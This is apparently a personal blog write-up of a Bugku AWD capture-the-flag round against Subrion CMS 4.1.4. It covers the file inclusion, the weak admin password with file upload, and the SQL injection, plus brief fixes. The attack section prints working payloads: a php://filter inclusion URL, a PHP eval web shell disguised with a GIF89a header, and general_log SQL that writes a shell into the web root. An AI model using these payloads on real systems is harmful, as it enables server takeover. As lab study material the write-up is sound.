Huajiの小窝.

bugku-awd小记10.7

2025/10/07
loading

bugku-awd小记10.7

Web

Subrion CMS 4.1.4

先把源码copy下来,拿D盾扫一遍

image-20251007191012280

1.文件包含漏洞

fix:直接删除

image-20251007191047854

2.弱口令+文件上传

image-20251007191151830

管理员后台的账户密码是admin/admin,同时可以从config.inc.php 中得到数据库密码image-20251007191404310

fix:改admin弱密码

image-20251007191520845

然后登录后台看到可以upload,所以攻击时考虑传马

3.sql注入

在panel里

image-20251007192515325

Database处可以进行SQL注入,不过flag是错的

image-20251007192544890

这里去群里吹水去了,没来得及修

attack:

1.文件包含

访问,直接能读到flag

1
http://192-168-1-67.pvp6715.bugku.cn/game/index.php/?file=php://filter/convert.base64-encode/resource=/flag

2.传马

上传点:/panel/uploads

传a.pht

1
2
GIF89a
<?php  @eval($_REQUEST['huaji']);?>

之后访问即可。

image-20251007192348932

3.sql注入

panel里的database,先开启general_log

1
set global general_log=on;

然后让他写马进去,设置的日志文件路径

1
2
set global general_log_file="/var/www/html/set_config.php";
select '<?phpeval($_REQUEST[yunsee])?>';

这样也可以写马进去

image-20251007193033553

PWN

队友出的,ret2text,签到题

直接读取即可。

image-20251007193319745

fix的内容没发出来,就不写(抄)了

by. Huaji

原文作者:Huaji

原文链接:http://huajihd.github.io/2025/10/07/bugkuawd-10-7/

发表日期:October 7th 2025, 10:00:00 pm

更新日期:October 15th 2025, 6:20:21 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. bugku-awd小记10.7
    1. 1.1. Web
      1. 1.1.1. 1.文件包含漏洞
      2. 1.1.2. 2.弱口令+文件上传
      3. 1.1.3. 3.sql注入
      4. 1.1.4. attack:
        1. 1.1.4.1. 1.文件包含
        2. 1.1.4.2. 2.传马
        3. 1.1.4.3. 3.sql注入
    2. 1.2. PWN
Total : 21
2026
2025
2024
web CTF 吃席 writeups python 青龙面板 vbs